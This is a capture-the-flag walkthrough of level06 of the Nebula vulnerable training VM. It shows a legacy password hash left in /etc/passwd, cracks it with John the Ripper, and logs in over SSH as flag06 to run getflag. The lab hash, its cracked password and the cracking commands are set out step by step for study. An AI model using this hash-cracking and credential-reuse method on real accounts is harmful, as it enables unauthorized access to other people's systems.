Nebula level06 Walkthrough

Nebula is a vulnerable virtual machine which has a variety of weaknesses and vulnerabilities in a Linux system.

Description of level06
“The flag06 account credentials came from a legacy unix system. To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.”

Inspecting the /home/flag06

level06@nebula:/home/flag06$ ls -la
total 9
drwxr-x — — 1 flag06 level06 80 2017–04–29 01:50 .
drwxr-xr-x 1 root root 180 2012–08–27 07:18 ..
-rw — — — — 1 flag06 flag06 43 2017–04–29 01:50 .bash_history
-rw-r — r — 1 flag06 flag06 220 2011–05–18 02:54 .bash_logout
-rw-r — r — 1 flag06 flag06 3353 2011–05–18 02:54 .bashrc
drwx — — — 2 flag06 flag06 60 2017–04–29 01:43 .cache
-rw-r — r — 1 flag06 flag06 675 2011–05–18 02:54 .profile

The /home/flag06 directory has nothing interesting in it.

Earlier passwords were stored in /etc/passwd. But as /etc/passwd is accessible by everyone they were later moved to /etc/shadow.

Vulnerability

level06:x:1007:1007::/home/level06:/bin/sh
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
level07:x:1008:1008::/home/level07:/bin/sh
flag07:x:992:992::/home/flag07:/bin/sh

Game Plan

  • Crack the password with johntheripper
root@kali:~# cat crack.txt
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
root@kali:~# john crack.txt — show
flag06:hello:993:993::/home/flag06:/bin/sh
1 password hash cracked, 0 left

  • Login to flag06 with password hello
➜  ~ ssh flag06@192.168.1.9
      _   __     __          __
/ | / /__ / /_ __ __/ /___ _
/ |/ / _ \/ __ \/ / / / / __ `/
/ /| / __/ /_/ / /_/ / / /_/ /
/_/ |_/\___/_.___/\__,_/_/\__,_/
exploit-exercises.com/nebula
For level descriptions, please see the above URL.
To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.
Currently there are 20 levels (00 - 19).
flag06@192.168.1.9's password:
Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)
* Documentation:  https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
flag06@nebula:~$ getflag
You have successfully executed getflag on a target account
flag06@nebula:~$ id
uid=993(flag06) gid=993(flag06) groups=993(flag06)

Happy Hacking !!!